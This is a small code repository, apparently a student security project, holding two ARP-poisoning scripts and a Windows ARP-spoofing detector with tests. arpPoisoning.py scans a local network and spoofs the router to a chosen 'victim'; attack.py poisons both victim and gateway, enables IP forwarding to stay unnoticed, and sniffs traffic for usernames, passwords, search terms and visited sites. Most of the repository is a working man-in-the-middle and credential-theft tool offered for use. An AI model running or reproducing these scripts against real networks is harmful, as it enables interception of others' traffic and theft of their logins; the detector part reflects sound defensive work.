├── .gitignore ├── LICENSE ├── arpPoisoning.py ├── arpdetect ├── arpdetect.py └── tests.py └── attack.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | lib/ 17 | lib64/ 18 | parts/ 19 | sdist/ 20 | var/ 21 | *.egg-info/ 22 | .installed.cfg 23 | *.egg 24 | 25 | # PyInstaller 26 | # Usually these files are written by a python script from a template 27 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 28 | *.manifest 29 | *.spec 30 | 31 | # Installer logs 32 | pip-log.txt 33 | pip-delete-this-directory.txt 34 | 35 | # Unit test / coverage reports 36 | htmlcov/ 37 | .tox/ 38 | .coverage 39 | .cache 40 | nosetests.xml 41 | coverage.xml 42 | 43 | # Translations 44 | *.mo 45 | *.pot 46 | 47 | # Django stuff: 48 | *.log 49 | 50 | # Sphinx documentation 51 | docs/_build/ 52 | 53 | # PyBuilder 54 | target/ 55 | ### https://raw.github.com/github/gitignore/eda2ee70de1bf7db7e0aba7c7b71aeb2c1c7eeec/Global/Vim.gitignore 56 | 57 | [._]*.s[a-w][a-z] 58 | [._]s[a-w][a-z] 59 | *.un~ 60 | Session.vim 61 | .netrwhist 62 | *~ 63 | 64 | 65 | ### https://raw.github.com/github/gitignore/eda2ee70de1bf7db7e0aba7c7b71aeb2c1c7eeec/Global/SublimeText.gitignore 66 | 67 | # workspace files are user-specific 68 | *.sublime-workspace 69 | 70 | # project files should be checked into the repository, unless a significant 71 | # proportion of contributors will probably not be using SublimeText 72 | # *.sublime-project 73 | 74 | 75 | ### https://raw.github.com/github/gitignore/eda2ee70de1bf7db7e0aba7c7b71aeb2c1c7eeec/Global/OSX.gitignore 76 | 77 | .DS_Store 78 | .AppleDouble 79 | .LSOverride 80 | 81 | # Icon must ends with two \r. 82 | Icon 83 | 84 | # Thumbnails 85 | ._* 86 | 87 | # Files that might appear on external disk 88 | .Spotlight-V100 89 | .Trashes 90 | 91 | 92 | ### https://raw.github.com/github/gitignore/eda2ee70de1bf7db7e0aba7c7b71aeb2c1c7eeec/Global/Windows.gitignore 93 | 94 | # Windows image file caches 95 | Thumbs.db 96 | ehthumbs.db 97 | 98 | # Folder config file 99 | Desktop.ini 100 | 101 | # Recycle Bin used on file shares 102 | $RECYCLE.BIN/ 103 | 104 | # Windows Installer files 105 | *.cab 106 | *.msi 107 | *.msm 108 | *.msp 109 | 110 | 111 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 CrypTeam 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /arpPoisoning.py: -------------------------------------------------------------------------------- 1 | import sys, string, argparse, re, os 2 | from socket import * 3 | from struct import * 4 | from time import sleep 5 | from subprocess import Popen, PIPE,check_output 6 | from uuid import getnode 7 | 8 | ETHER_BROADCAST = "\xff"*6 # NOTE(cab): Broadcast address (ff:ff:ff:ff:ff:ff) 9 | ETH_P_ETHERNET = 0x0001 # NOTE(cab): Hardware type(protocole) Ethernet 10 | ETH_P_IP = 0x0800 # NOTE(cab): IPv4 11 | ETH_P_ARP = 0x0806 # NOTE(cab): ARP 12 | ETH_P_H_LEN = 0x0006 # NOTE(cab): Ethernet addresses size is 6 13 | ETH_P_P_LEN = 0x0004 # NOTE(cab): IPv4 addresses size is 4 14 | ETH_P_OPER = 0x0002 # NOTE(cab): Type of operation; 1 for request and 2 for reply 15 | ETH_ADAPTER = "eth1" # NOTE(cab): Network adapter 16 | # NOTE(cab): List ot EtherType - http://en.wikipedia.org/wiki/EtherType 17 | 18 | verbose = True 19 | 20 | def mac_to_string(mac_address): 21 | return ':'.join(("%012X" % mac_address)[i:i+2] for i in range(0, 12, 2)).upper() 22 | 23 | def string_to_mac(mac_address): 24 | return mac_address.replace(':', '').lower().decode('hex') 25 | 26 | def log(message): 27 | if verbose: 28 | print(message) 29 | 30 | def startPoisoning(victim_ip, router_ip): 31 | os.system('clear') 32 | log("You are now attacking " + victim_ip + " ...") 33 | log("And you will be spoofed as the router at " + router_ip) 34 | 35 | try: 36 | # NOTE(cab): 37 | # AF_PACKET = Type of packet (packet socket) 38 | # |-> doesn't work on Windows nor OS X. Will have to use https://pypi.python.org/pypi/pypcap 39 | # |-> Or use Ubuntu 40 | # SOCK_RAW = Send without any changes in the packet data 41 | # htons = Convert to unsigned short host byte order to network byte order 42 | # Source: http://man7.org/linux/man-pages/man7/packet.7.html 43 | s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)) 44 | s.bind((ETH_ADAPTER, ETH_P_ARP)) 45 | my_mac = getnode() 46 | 47 | # NOTE(cab): Can't use gethostname() since it return 127.0.0.1 on Ubuntu 48 | my_ip = gethostbyname(getfqdn()) 49 | 50 | # NOTE(cab): From the documentation, the last bit is set to 1 if 51 | # the MAC Address is invalid 52 | if (my_mac >> 40) % 2: 53 | print "This MAC Address is invalid" 54 | print "I do not know what to do" 55 | print "I QUIT !" 56 | return 57 | 58 | my_mac = mac_to_string(my_mac) 59 | log("Current User IP Address: " + my_ip) 60 | log("Current User MAC Address: " + my_mac) 61 | 62 | packet = create_packet(victim_ip, router_ip, my_mac) 63 | 64 | sleep_time = 1 65 | log("Sending every " + str(sleep_time) + " seconds") 66 | while True: 67 | log("Sending packet") 68 | s.send(packet) 69 | sleep(sleep_time) 70 | except KeyboardInterrupt: 71 | log("Interrupted by user") 72 | pass 73 | 74 | # NOTE(cab): 75 | # Packet Structure: 76 | # http://en.wikipedia.org/wiki/Address_Resolution_Protocol#Packet_structure 77 | # Format: 78 | # inet_aton = Convert IPv4 into binary form (in network by order) 79 | # INADDR_ANY = Bound to all local interfaces 80 | # pack -> Byte Order 81 | # ! = network (= big-endian) 82 | # -> Format 83 | # I = unsigned int 84 | # H = unsigned short 85 | # B = unsigned char 86 | def create_packet(victim_ip, router_ip, my_mac): 87 | victim_mac = get_mac_from_ip(victim_ip) 88 | log("Victim MAC Address: " + victim_mac) 89 | 90 | # NOTE(cab): This fixes all my proble, I had to convert to binary format! 91 | my_mac = string_to_mac(my_mac) 92 | victim_mac = string_to_mac(victim_mac) 93 | 94 | arp_frame = [ 95 | victim_mac, 96 | my_mac, 97 | pack("!H", ETH_P_ARP), 98 | pack("!HHBBH", ETH_P_ETHERNET, ETH_P_IP, ETH_P_H_LEN, ETH_P_P_LEN, ETH_P_OPER), 99 | my_mac, 100 | inet_aton(router_ip), 101 | ETHER_BROADCAST, 102 | pack("!I", INADDR_ANY) 103 | ] 104 | return ''.join(arp_frame) 105 | 106 | def get_mac_from_ip(ip_address): 107 | # NOTE(cab): Snippet from: http://snipplr.com/view/70832/get-arp-mac-from-ip-address/ 108 | Popen(["ping", "-c 1", ip_address], stdout = PIPE) 109 | pid = Popen(["arp", "-n", ip_address], stdout = PIPE) 110 | s = pid.communicate()[0] 111 | mac_address = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0] 112 | return mac_address.upper() 113 | 114 | def getIpAddresses(): 115 | # NOTE(cab): Snippet from: http://ubuntuforums.org/showthread.php?t=724138 116 | raw_list = getaddrinfo(gethostname(), None) 117 | 118 | ip_addresses = [] 119 | for item in raw_list: 120 | ip_addresses.append(item[4][0]) 121 | 122 | # NOTE(cab): We want only unique values, but want to be able to still 123 | # access the item at a certain index 124 | # TODO(cab): Must remove self - lol 125 | return list(set(ip_addresses)) 126 | 127 | def ipScanner(range_selection): 128 | # NOTE(cab): Snippet from: https://code.google.com/p/jaccon-ipscanner/source/browse/ipscanner.py 129 | 130 | selected_range = [] 131 | if range_selection == 0: 132 | selected_range.append("192.168.0.") 133 | elif range_selection == 1: 134 | selected_range.append("192.168.1.") 135 | elif range_selection == 2: 136 | selected_range.append("192.168.2.") 137 | elif range_selection == 3: 138 | selected_range.extend(("192.168.0.", "192.168.1.", "192.168.2.")) 139 | else: 140 | selected_range.append("192.168.1.") 141 | 142 | scanned_ips = [] 143 | active_ips = [] 144 | 145 | devnull = open(os.devnull, "wb") # NOTE(cab): We do not want to output the 146 | # results in the console 147 | 148 | log("PROCESSING - PLEASE WAIT") 149 | for ip_range in selected_range: 150 | for i in range(1, 255): 151 | ip = ip_range + str(i) 152 | # Start ping process 153 | scanned_ips.append((ip, Popen(['ping', '-c 5', ip], stdout = devnull))) 154 | 155 | while scanned_ips: 156 | for i, (ip, proc) in enumerate(scanned_ips[:]): 157 | if proc.poll() is not None: # Ping has finished 158 | scanned_ips.remove((ip, proc)) # Fugly - O(n^2) 159 | if proc.returncode == 0: 160 | active_ips.append(ip) 161 | # Else we do not care 162 | 163 | devnull.close() 164 | return active_ips 165 | 166 | def manualAttackMenu(): 167 | os.system('clear') 168 | print "Type 'exit' to exit or 'return' to go back in the menus" 169 | user_selection = raw_input("Please enter the IP Address (no validations): ") 170 | if user_selection == "return": 171 | runIPScannerMenu() 172 | elif user_selection == "exit": 173 | log("Exited by user") 174 | return 175 | else: 176 | victim_ip = user_selection 177 | router_ip = findRouterIP() 178 | startPoisoning(victim_ip, router_ip) 179 | 180 | def mainMenu(): 181 | os.system('clear') 182 | print "================================" 183 | print "Let's Arp Poison all the things!" 184 | print "================================" 185 | print " - By CAB" 186 | print "\n" 187 | print "[0] Yes" 188 | print "[1] No, run the IP Scanner" 189 | print "Type 'exit' to exit or 'return' to go back in the menus" 190 | user_selection = raw_input("Do you already know the ip address you want to spoof? ") 191 | if user_selection == "0": 192 | manualAttackMenu() 193 | elif user_selection == "1": 194 | runIPScannerMenu() 195 | else: 196 | log("Exited by user") 197 | return 198 | 199 | def runIPScannerMenu(): 200 | os.system('clear') 201 | print "[0] 192.168.0.x" 202 | print "[1] 192.168.1.x" 203 | print "[2] 192.168.2.x" 204 | print "[3] I do not know (will run them all)" 205 | print "Type 'exit' to exit or 'return' to go back in the menus" 206 | user_selection = raw_input("Select the IP range you are interested with: ") 207 | if user_selection == "return": 208 | mainMenu() 209 | elif user_selection == "exit": 210 | log("Exited by user") 211 | return 212 | else: 213 | ip_addresses = ipScanner(int(user_selection)) 214 | selectIpToAttackMenu(ip_addresses) 215 | 216 | def selectIpToAttackMenu(ip_addresses): 217 | os.system('clear') 218 | for index, ip_address in enumerate(ip_addresses): 219 | print "["+ str(index) +"]" + ip_address + " - " + getfqdn(ip_address) 220 | 221 | print "Type 'exit' to exit or 'return' to go back in the menus" 222 | user_selection = raw_input("Select a user to attack: ") 223 | 224 | if user_selection == "return": 225 | runIPScannerMenu() 226 | elif user_selection == 'exit': 227 | log("Exited by user") 228 | return 229 | else: 230 | parsed_selection = int(user_selection) 231 | victim_ip = ip_addresses[parsed_selection] 232 | router_ip = findRouterIP() 233 | startPoisoning(victim_ip, router_ip) 234 | 235 | def findRouterIP(): 236 | route_ip = check_output("route | grep default", shell=True).split() 237 | return router_ip[1] 238 | 239 | mainMenu() 240 | -------------------------------------------------------------------------------- /arpdetect/arpdetect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import os 4 | import subprocess 5 | #import wmi 6 | import argparse 7 | import logging 8 | import datetime 9 | import time 10 | 11 | LOG = False 12 | DROP = False 13 | INSPECT_INTERVAL = 5 # In seconds 14 | 15 | # A host device 16 | class Host: 17 | def __init__(self, item): 18 | self.ipv4 = item[0] 19 | self.mac = item[1] 20 | self.type = item[2] 21 | 22 | def toString(self): 23 | return "Ip:{} | MAC:{} | Type:{}".format( 24 | self.ipv4, 25 | self.mac, 26 | self.type 27 | ) 28 | 29 | # A suspected device 30 | class Suspect: 31 | def __init__(self): 32 | self.ipv4 = "Unknown" 33 | self.mac = "Unknown" 34 | 35 | def toString(self): 36 | return "Ip:{} | MAC:{}".format( 37 | self.ipv4, 38 | self.mac 39 | ) 40 | 41 | # Read the arp table and return its content 42 | def arpFind(): 43 | # Execute os arp to find known devices 44 | proc = subprocess.Popen('arp -a', shell=True, stdout=subprocess.PIPE) 45 | hosts = [] 46 | for line in proc.stdout: 47 | items = line.split() 48 | 49 | if len(items) == 3 and items[2].startswith('dyn'): 50 | hosts.append( items ) 51 | 52 | proc.wait() 53 | return hosts 54 | 55 | # Drop the arp table 56 | def arpDrop(): 57 | if DROP: 58 | log("Dropping ARP table...") 59 | # Need admin rights to drop table 60 | os.system('arp -d') 61 | # log("ARP table dropped.") 62 | 63 | # Compare current and past host to detect an arp spoof attack 64 | def inspect(gateway, hosts, pHosts): 65 | suspicious = False 66 | suspect = Suspect() 67 | 68 | # Detect a change in the gateway's mac 69 | if len(pHosts) > 0: 70 | pGateway = pHosts[0] 71 | if (gateway.ipv4 == pGateway.ipv4) and (gateway.mac != pGateway.mac): 72 | suspicious = True 73 | suspect.mac = gateway.mac 74 | 75 | # Find a device thats has the same mac as our gateway 76 | for host in hosts[1:]: # Skip first 77 | if host.mac == gateway.mac: 78 | suspicious = True 79 | suspect.ipv4 = host.ipv4 80 | suspect.mac = host.mac 81 | 82 | return (suspicious, suspect) 83 | 84 | def log(string): 85 | print string 86 | if LOG: 87 | logging.info("[{}] - {}".format(datetime.datetime.now(), string)) 88 | 89 | if __name__ == "__main__": 90 | # Script only runs on windows 91 | if os.name != "nt": 92 | sys.exit(); 93 | 94 | parser = argparse.ArgumentParser() 95 | parser.add_argument("-l", "--log", nargs='?', default="none", help="log events to a file") 96 | parser.add_argument("-d", "--drop", action='store_true', help="drop ARP table when an attack is suspected") 97 | args = parser.parse_args() 98 | 99 | if args.log != 'none': 100 | logging.basicConfig(filename=args.log, level=logging.DEBUG) 101 | LOG = True 102 | if args.drop: 103 | DROP = True 104 | 105 | hosts = [] 106 | pHosts = [] # Previous hosts 107 | 108 | log("ARP spoofing detection running...") 109 | try: 110 | while True: 111 | hosts = [Host(x) for x in arpFind()] 112 | 113 | # TODO more stable 114 | gateway = hosts[0] 115 | suspicious, suspect = inspect(gateway, hosts, pHosts) 116 | 117 | pHosts = hosts 118 | 119 | # If we consider the arp table to have been altered 120 | # we drop it so it gets rebuilt 121 | if suspicious: 122 | log("ARP spoofing detected\nSuspect = {}".format(suspect.toString())) 123 | arpDrop() 124 | pHosts = [] 125 | 126 | time.sleep(INSPECT_INTERVAL) 127 | 128 | except KeyboardInterrupt: 129 | pass 130 | 131 | log("ARP spoofing detection stopped.") 132 | -------------------------------------------------------------------------------- /arpdetect/tests.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import os 4 | import arpdetect 5 | 6 | def test(result): 7 | print ("Success" if result else "Fail") 8 | 9 | # Not suspicious ARP table 10 | def test1(): 11 | pHosts = [ 12 | arpdetect.Host(["192.168.1.1", "00-00-00-00-00-00", "dynamique"]), 13 | arpdetect.Host(["192.168.1.101", "11-11-11-11-11-11", "dynamique"]), 14 | arpdetect.Host(["192.168.1.102", "22-22-22-22-22-22", "dynamique"]), 15 | ] 16 | hosts = pHosts 17 | suspicious, suspect = arpdetect.inspect(hosts[0], hosts, pHosts) 18 | return not suspicious 19 | 20 | # Suspicious as Gateway changed MAC 21 | def test2(): 22 | pHosts = [ 23 | arpdetect.Host(["192.168.1.1", "00-00-00-00-00-00", "dynamique"]), 24 | arpdetect.Host(["192.168.1.101", "11-11-11-11-11-11", "dynamique"]), 25 | arpdetect.Host(["192.168.1.102", "22-22-22-22-22-22", "dynamique"]), 26 | ] 27 | hosts = [ 28 | arpdetect.Host(["192.168.1.1", "55-55-55-55-55-55", "dynamique"]), 29 | arpdetect.Host(["192.168.1.101", "11-11-11-11-11-11", "dynamique"]), 30 | arpdetect.Host(["192.168.1.102", "22-22-22-22-22-22", "dynamique"]), 31 | ] 32 | suspicious, suspect = arpdetect.inspect(hosts[0], hosts, pHosts) 33 | return suspicious and suspect.mac == "55-55-55-55-55-55" and suspect.ipv4 == "Unknown" 34 | 35 | # Suspicious as Gateway changed MAC, also suspecr ip is known 36 | def test3(): 37 | pHosts = [ 38 | arpdetect.Host(["192.168.1.1", "00-00-00-00-00-00", "dynamique"]), 39 | arpdetect.Host(["192.168.1.101", "11-11-11-11-11-11", "dynamique"]), 40 | arpdetect.Host(["192.168.1.102", "22-22-22-22-22-22", "dynamique"]), 41 | ] 42 | hosts = [ 43 | arpdetect.Host(["192.168.1.1", "22-22-22-22-22-22", "dynamique"]), 44 | arpdetect.Host(["192.168.1.101", "11-11-11-11-11-11", "dynamique"]), 45 | arpdetect.Host(["192.168.1.102", "22-22-22-22-22-22", "dynamique"]), 46 | ] 47 | suspicious, suspect = arpdetect.inspect(hosts[0], hosts, pHosts) 48 | return suspicious and suspect.mac == "22-22-22-22-22-22" and suspect.ipv4 == "192.168.1.102" 49 | 50 | if __name__ == "__main__": 51 | # Script only runs on windows 52 | if os.name != "nt": 53 | sys.exit(); 54 | 55 | # Test 1 56 | test(test1()) 57 | test(test2()) 58 | test(test3()) -------------------------------------------------------------------------------- /attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from scapy.all import * 4 | import threading 5 | import argparse 6 | import os 7 | import sys 8 | 9 | 10 | 11 | def arg_parser(): 12 | parser = argparse.ArgumentParser() 13 | parser.add_argument("-r", "--routerIP", help="IP du router. Example: -r 192.168.1.1") 14 | parser.add_argument("-v", "--victimIP", help="IP de la victime. Example: -v 192.168.1.5") 15 | parser.add_argument("-m", "--monitor", help="Moniteur. Example: wlan0") 16 | return parser.parse_args() 17 | 18 | print 'Attaque en cours...Passez une bonne journee!' 19 | os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') #la victime doit recevoir le paquet pour loader sa page web sinon il se doutera de quelque chose 20 | 21 | def searchBing(pkt): 22 | try: 23 | if pkt.haslayer(Raw): 24 | payload = pkt.getlayer(Raw).load 25 | if payload.startswith("GET"): 26 | search = payload.split('\n', 1)[0].split('&')[0] 27 | if 'search?q' in search : 28 | searchTerm = search.split('search?q=',1)[1] 29 | searchTerm = searchTerm.replace('+',' ') 30 | print "Une recherche BING de " + arg_parser().victimIP + " pour : " + searchTerm 31 | except: 32 | print 'error search' 33 | 34 | def visitedWebsite(pkt): 35 | try: 36 | if pkt.haslayer(Raw): 37 | payloadWeb = pkt.getlayer(Raw).load 38 | if payloadWeb.startswith("GET") and 'Referer:' in payloadWeb: 39 | print "La victime " + arg_parser().victimIP +" a ete sur " + payloadWeb.split('Referer: ')[1].split('\n',1)[0] 40 | except: 41 | print 'error visited' 42 | 43 | def Attack(pkt): 44 | getUsernamePassword(pkt) #utilise si on souhaite d/ecouvrir des noms dusager ou mot de passe 45 | searchBing(pkt) 46 | visitedWebsite(pkt) 47 | 48 | 49 | def getUsernamePassword(pkt): 50 | if pkt.haslayer(Raw): 51 | payload = pkt.getlayer(Raw).load 52 | user_regex = '([Ee]mail|%5B[Ee]mail%5D|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&|;]*)' 53 | pw_regex = '([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][Ss][Ww]|[Pp]asswrd|[Pp]assw|%5B[Pp]assword%5D)=([^&|;]*)' 54 | username = re.findall(user_regex, payload) 55 | password = re.findall(pw_regex, payload) 56 | print username 57 | print password 58 | 59 | def v_poison(): 60 | v = ARP(pdst=arg_parser().victimIP, psrc=arg_parser().routerIP) 61 | while True: 62 | try: 63 | send(v,verbose=0,inter=1,loop=1) 64 | except KeyboardInterupt: # Functions constructing and sending the ARP packets 65 | sys.exit(1) 66 | def gw_poison(): 67 | gw = ARP(pdst=arg_parser().routerIP, psrc=arg_parser().victimIP) 68 | while True: 69 | try: 70 | send(gw,verbose=0,inter=1,loop=1) 71 | except KeyboardInterupt: 72 | sys.exit(1) 73 | 74 | vthread = [] 75 | gwthread = [] 76 | 77 | 78 | while True: # Threads 79 | 80 | vpoison = threading.Thread(target=v_poison) 81 | vpoison.setDaemon(True) 82 | vthread.append(vpoison) 83 | vpoison.start() 84 | 85 | gwpoison = threading.Thread(target=gw_poison) 86 | gwpoison.setDaemon(True) 87 | gwthread.append(gwpoison) 88 | gwpoison.start() 89 | 90 | sniff(filter='tcp', iface=arg_parser().monitor, prn=Attack) 91 | --------------------------------------------------------------------------------